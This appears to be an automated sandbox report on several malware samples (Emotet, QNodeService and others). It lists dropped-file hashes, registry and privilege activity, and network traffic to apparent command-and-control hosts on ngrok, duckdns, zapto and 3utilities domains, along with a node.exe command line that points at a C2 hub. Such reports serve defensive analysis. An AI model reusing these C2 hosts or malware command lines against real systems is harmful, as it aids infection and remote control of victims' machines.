C:\rdp\db.rar

MD5 462f221d1e2f31d564134388ce244753
SHA1 6b65372f40da0ca9cd1c032a191db067d40ff2e3
SHA256 534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432
SHA512 5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086

C:\Programdata\Install\del.bat

MD5 ed57b78906b32bcc9c28934bb1edfee2
SHA1 4d67f44b8bc7b1d5a010e766c9d81fb27cab8526
SHA256 c3a1bd76b8539fdf83b723f85b6ea7cd35104b0ec14429774059208d2660177d
SHA512 d2a95257e37b4b4154aec2234e31423632598a870d2bb803ce27cb242d5bdff5ea1b7475577245f80d3ad069872e9ae2adcd05d5145e081db864185a5e7bda33

C:\Windows\System32\drivers\etc\hosts

MD5 d85d974315792326bbd4c7e58130c5e4
SHA1 3bc9eb9bef0209c53ad7761d907f42be0e94f3db
SHA256 b96a11cffa0d02884e1ee8ab133bfbc3ad717931f4be5d6de1c6a83f80f77054
SHA512 4737e948fb4a6724a20cd185f47c412a8d1632b0379a5b6ed9c31ab07ea6fab48fec2b6f7a94e52ca9eb35a7a602989f5fc01dd7089bdeeca789b4027ff41f9e

C:\rdp\RDPWInst.exe

MD5 3288c284561055044c489567fd630ac2
SHA1 11ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256 ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512 c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

\??\c:\program files\rdp wrapper\rdpwrap.ini

MD5 dddd741ab677bdac8dcd4fa0dda05da2
SHA1 69d328c70046029a1866fd440c3e4a63563200f9
SHA256 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668
SHA512 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

C:\Program Files\RDP Wrapper\rdpwrap.dll

MD5 461ade40b800ae80a40985594e1ac236
SHA1 b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

C:\ProgramData\RealtekHD\taskhost.exe

MD5 676f368fed801fb2a5350f3bdc631d0b
SHA1 e129c24447d7986fb0ed1725b240c00d4d9489ea
SHA256 5c4eaa5bce7f19f29013685899d8205245f4a5a7728e770458619510e661b145
SHA512 d4a3fb68eea4bcad55657a17ff8474d220e6e6cd113cb42d4d00a698e59941b1dab33bb626901fedeb312dee0c0a0559f9e4a75761028eab69a686c61e81160d

C:\rdp\bat.bat

MD5 5835a14baab4ddde3da1a605b6d1837a
SHA1 94b73f97d5562816a4b4ad3041859c3cfcc326ea
SHA256 238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92
SHA512 d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

C:\rdp\install.vbs

MD5 6d12ca172cdff9bcf34bab327dd2ab0d
SHA1 d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493
SHA256 f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec
SHA512 b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

C:\Program Files\Common Files\System\iediagcmd.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3864-378-0x0000000000400000-0x000000000056F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

MD5 1e453f87d920d227e748bad8b08c98ee
SHA1 8221c909bd5f33a7cf56fe908b1ff40f3d263bad
SHA256 a737fe42f5b664b332d513c1320d1861c8501b8a3b5797321f1b25f02615203a
SHA512 9d5ffc4d90512612c107761a8ed120ed2211305f049181c878e6daf2b6c3989491ffcd366d339f98cecbf72e108dbeda86107cf14df49c27cbe80f32624d47b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

MD5 e10a2a16e19843942191cdd2c33f0dbe
SHA1 fc4216d9b1c319680884193aa975196f610a689c
SHA256 599ca69375627e049b3deab0ade75cb0dd3be5899ac4e6d41ebfd71c3b119bbf
SHA512 6c67f24668bfd27cea0278bab7358a49a9b185361e1cd963075e2282496773ea5d73f74cdaa3355955eaaab172c772ab1b61adb8edb478b88caf78643413c6fd

memory/4328-399-0x0000000000400000-0x000000000056F000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 e335b19dd00855d6d352f8c0512bab33
SHA1 335f886a166b852beeb1dfec3d27eeced4a11547
SHA256 8f16e9d38dd11092dd0ef01e91c551aa15d161396e84c9b534de8d646118028d
SHA512 ef8cda0161d1be8a84942e20689163a880e3d95f7914a6c80f9b2714ca26fe5cbb677a2341ad5bda203e0cbad71b3df9a068e2accfc2164d132adfbdbb9adbcd

memory/2564-652-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2564-662-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aut484F.tmp

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

memory/3400-674-0x0000000000610000-0x00000000006FC000-memory.dmp

memory/3400-680-0x0000000000610000-0x00000000006FC000-memory.dmp

memory/2564-686-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\WindowsTask\MicrosoftHost.exe

MD5 191f67bf26f68cef47359b43facfa089
SHA1 94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc
SHA256 2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5
SHA512 7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b

memory/5024-701-0x000001BA1AE30000-0x000001BA1AE44000-memory.dmp

C:\ProgramData\WindowsTask\WinRing0x64.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

memory/2564-710-0x0000000000400000-0x0000000000AB9000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

149s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js

Signatures

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp
US 8.8.8.8:53 dobiacamarmnia.3utilities.com udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

138s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe"

Signatures

Emotet

trojan banker emotet

Emotet family

emotet

Emotet payload

trojan banker
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe

"C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe"

C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe

"C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 182.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 71.57.180.213:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 21.49.80.91.in-addr.arpa udp
SE 185.86.148.68:443 tcp
US 168.235.82.183:8080 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
EC 181.113.229.139:443 tcp
CO 181.134.9.162:80 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
GB 217.199.160.224:8080 tcp
ZA 105.209.235.113:8080 tcp

Files

memory/5032-0-0x0000000002260000-0x000000000226C000-memory.dmp

memory/5032-4-0x0000000002250000-0x0000000002259000-memory.dmp

C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe

MD5 6becbc70725f55f6e6dbe66f383f82bf
SHA1 7ea5f70e20171e23ccec3c18da638b78dcadfc5c
SHA256 93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1
SHA512 e3d8815ea584ec745bc103494e123ca489bdc8b8599745548acab449b9630a7e4a8d47c63db752aee63d18d1fec10f961f2f9c4cdc2324c26460c80421e09957

memory/5032-6-0x0000000000400000-0x0000000000475000-memory.dmp

memory/2548-7-0x00000000020C0000-0x00000000020CC000-memory.dmp

memory/2548-11-0x00000000020C0000-0x00000000020CC000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fb5d110ced698b06c6cb8c7112792a2d37c579dcd9bde808310cb8dc88e16d9c.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A 3.tcp.ngrok.io N/A N/A
N/A 3.tcp.ngrok.io N/A N/A
N/A 3.tcp.ngrok.io N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\fb5d110ced698b06c6cb8c7112792a2d37c579dcd9bde808310cb8dc88e16d9c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\fb5d110ced698b06c6cb8c7112792a2d37c579dcd9bde808310cb8dc88e16d9c.exe

"C:\Users\Admin\AppData\Local\Temp\fb5d110ced698b06c6cb8c7112792a2d37c579dcd9bde808310cb8dc88e16d9c.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 101.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 3.tcp.ngrok.io udp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 3.131.123.134:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 3.tcp.ngrok.io udp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 3.138.228.94:24041 3.tcp.ngrok.io tcp
US 8.8.8.8:53 3.tcp.ngrok.io udp
US 18.220.222.33:24041 3.tcp.ngrok.io tcp
US 18.220.222.33:24041 3.tcp.ngrok.io tcp
US 18.220.222.33:24041 3.tcp.ngrok.io tcp
US 18.220.222.33:24041 3.tcp.ngrok.io tcp

Files

memory/2512-0-0x00007FFEC6EE5000-0x00007FFEC6EE6000-memory.dmp

memory/2512-1-0x00007FFEC6C30000-0x00007FFEC75D1000-memory.dmp

memory/2512-2-0x000000001B7E0000-0x000000001BCAE000-memory.dmp

memory/2512-3-0x000000001BD60000-0x000000001BE06000-memory.dmp

memory/2512-4-0x000000001BED0000-0x000000001BF32000-memory.dmp

memory/2512-5-0x00007FFEC6C30000-0x00007FFEC75D1000-memory.dmp

memory/2512-6-0x00007FFEC6EE5000-0x00007FFEC6EE6000-memory.dmp

memory/2512-7-0x00007FFEC6C30000-0x00007FFEC75D1000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file(1).exe"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\file(1).exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Users\Admin\AppData\Local\Temp\file(1).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file(1).exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\file(1).exe

"C:\Users\Admin\AppData\Local\Temp\file(1).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 yukselofficial.duckdns.org udp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 8.8.8.8:53 25.69.169.192.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 yukselofficial.duckdns.org udp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 8.8.8.8:53 yukselofficial.duckdns.org udp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 192.169.69.25:5552 yukselofficial.duckdns.org tcp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp
US 192.169.69.25:5552 tcp

Files

memory/3908-0-0x00007FFEEBD85000-0x00007FFEEBD86000-memory.dmp

memory/3908-2-0x000000001C020000-0x000000001C4EE000-memory.dmp

memory/3908-1-0x00007FFEEBAD0000-0x00007FFEEC471000-memory.dmp

memory/3908-3-0x000000001BA10000-0x000000001BAB6000-memory.dmp

memory/3908-4-0x000000001C5B0000-0x000000001C612000-memory.dmp

memory/3908-5-0x00007FFEEBAD0000-0x00007FFEEC471000-memory.dmp

memory/3908-6-0x00007FFEEBD85000-0x00007FFEEBD86000-memory.dmp

memory/3908-7-0x00007FFEEBAD0000-0x00007FFEEC471000-memory.dmp

memory/3908-8-0x00007FFEEBAD0000-0x00007FFEEC471000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

144s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\jar.jar

Signatures

QNodeService

trojan qnodeservice

Qnodeservice family

qnodeservice

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A

Processes

C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\jar.jar

C:\Program Files\Java\jre-1.8\bin\javaw.exe

"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\b7184e14.tmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain tmv2020.zapto.org

Network

Country Destination Domain Proto
US 8.8.8.8:53 101.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 nodejs.org udp
US 104.20.22.46:443 nodejs.org tcp
US 8.8.8.8:53 46.22.20.104.in-addr.arpa udp
US 8.8.8.8:53 tmv2020.zapto.org udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/3492-2-0x000001B849A00000-0x000001B849C70000-memory.dmp

memory/3492-14-0x000001B849C70000-0x000001B849C80000-memory.dmp

memory/3492-15-0x000001B849C80000-0x000001B849C90000-memory.dmp

memory/3492-16-0x000001B849C90000-0x000001B849CA0000-memory.dmp

memory/3492-18-0x000001B849CA0000-0x000001B849CB0000-memory.dmp

memory/3492-20-0x000001B849CB0000-0x000001B849CC0000-memory.dmp

memory/3492-22-0x000001B849CC0000-0x000001B849CD0000-memory.dmp

memory/3492-24-0x000001B849CD0000-0x000001B849CE0000-memory.dmp

memory/3492-26-0x000001B8483C0000-0x000001B8483C1000-memory.dmp

memory/3492-27-0x000001B849CE0000-0x000001B849CF0000-memory.dmp

memory/3492-29-0x000001B849CF0000-0x000001B849D00000-memory.dmp

memory/3492-31-0x000001B849A00000-0x000001B849C70000-memory.dmp

memory/3492-32-0x000001B849D00000-0x000001B849D10000-memory.dmp

memory/3492-36-0x000001B849D10000-0x000001B849D20000-memory.dmp

memory/3492-35-0x000001B849C80000-0x000001B849C90000-memory.dmp

memory/3492-34-0x000001B849C70000-0x000001B849C80000-memory.dmp

memory/3492-44-0x000001B849D30000-0x000001B849D40000-memory.dmp

memory/3492-47-0x000001B849D60000-0x000001B849D70000-memory.dmp

memory/3492-49-0x000001B849C90000-0x000001B849CA0000-memory.dmp

memory/3492-48-0x000001B849D70000-0x000001B849D80000-memory.dmp

memory/3492-46-0x000001B849D50000-0x000001B849D60000-memory.dmp

memory/3492-45-0x000001B849D40000-0x000001B849D50000-memory.dmp

memory/3492-43-0x000001B849D20000-0x000001B849D30000-memory.dmp

memory/3492-52-0x000001B849D80000-0x000001B849D90000-memory.dmp

memory/3492-51-0x000001B849CA0000-0x000001B849CB0000-memory.dmp

memory/3492-55-0x000001B849D90000-0x000001B849DA0000-memory.dmp

memory/3492-54-0x000001B849CB0000-0x000001B849CC0000-memory.dmp

memory/3492-58-0x000001B849DA0000-0x000001B849DB0000-memory.dmp

memory/3492-57-0x000001B849CC0000-0x000001B849CD0000-memory.dmp

memory/3492-63-0x000001B849DB0000-0x000001B849DC0000-memory.dmp

memory/3492-62-0x000001B849CD0000-0x000001B849CE0000-memory.dmp

memory/3492-65-0x000001B849DC0000-0x000001B849DD0000-memory.dmp

memory/3492-64-0x000001B849CE0000-0x000001B849CF0000-memory.dmp

memory/3492-69-0x000001B849DD0000-0x000001B849DE0000-memory.dmp

memory/3492-68-0x000001B849CF0000-0x000001B849D00000-memory.dmp

memory/3492-74-0x000001B849DE0000-0x000001B849DF0000-memory.dmp

memory/3492-73-0x000001B849D00000-0x000001B849D10000-memory.dmp

memory/3492-77-0x000001B849DF0000-0x000001B849E00000-memory.dmp

memory/3492-76-0x000001B849D10000-0x000001B849D20000-memory.dmp

memory/3492-87-0x000001B849E10000-0x000001B849E20000-memory.dmp

memory/3492-86-0x000001B849E00000-0x000001B849E10000-memory.dmp

memory/3492-85-0x000001B849D70000-0x000001B849D80000-memory.dmp

memory/3492-84-0x000001B849D60000-0x000001B849D70000-memory.dmp

memory/3492-83-0x000001B849D50000-0x000001B849D60000-memory.dmp

memory/3492-82-0x000001B849D40000-0x000001B849D50000-memory.dmp

memory/3492-81-0x000001B849D30000-0x000001B849D40000-memory.dmp

memory/3492-80-0x000001B849D20000-0x000001B849D30000-memory.dmp

memory/3492-89-0x000001B849D80000-0x000001B849D90000-memory.dmp

memory/3492-90-0x000001B849E20000-0x000001B849E30000-memory.dmp

memory/3492-97-0x000001B849E40000-0x000001B849E50000-memory.dmp

memory/3492-96-0x000001B849DA0000-0x000001B849DB0000-memory.dmp

memory/3492-95-0x000001B849E30000-0x000001B849E40000-memory.dmp

memory/3492-94-0x000001B8483C0000-0x000001B8483C1000-memory.dmp

memory/3492-93-0x000001B849D90000-0x000001B849DA0000-memory.dmp

memory/3492-99-0x000001B849DB0000-0x000001B849DC0000-memory.dmp

memory/3492-100-0x000001B849E50000-0x000001B849E60000-memory.dmp

memory/3492-104-0x000001B849E60000-0x000001B849E70000-memory.dmp

memory/3492-106-0x000001B849DD0000-0x000001B849DE0000-memory.dmp

memory/3492-107-0x000001B849E70000-0x000001B849E80000-memory.dmp

memory/3492-103-0x000001B849DC0000-0x000001B849DD0000-memory.dmp

memory/3492-109-0x000001B849E80000-0x000001B849E90000-memory.dmp

memory/3492-108-0x000001B849DE0000-0x000001B849DF0000-memory.dmp

memory/3492-112-0x000001B849DF0000-0x000001B849E00000-memory.dmp

memory/3492-116-0x000001B849EA0000-0x000001B849EB0000-memory.dmp

memory/3492-115-0x000001B849E10000-0x000001B849E20000-memory.dmp

memory/3492-114-0x000001B849E00000-0x000001B849E10000-memory.dmp

memory/3492-118-0x000001B849EB0000-0x000001B849EC0000-memory.dmp

memory/3492-113-0x000001B849E90000-0x000001B849EA0000-memory.dmp

memory/3492-121-0x000001B849E20000-0x000001B849E30000-memory.dmp

memory/3492-123-0x000001B849EC0000-0x000001B849ED0000-memory.dmp

memory/3492-122-0x000001B849E30000-0x000001B849E40000-memory.dmp

memory/3492-125-0x000001B849ED0000-0x000001B849EE0000-memory.dmp

memory/3492-128-0x000001B849EE0000-0x000001B849EF0000-memory.dmp

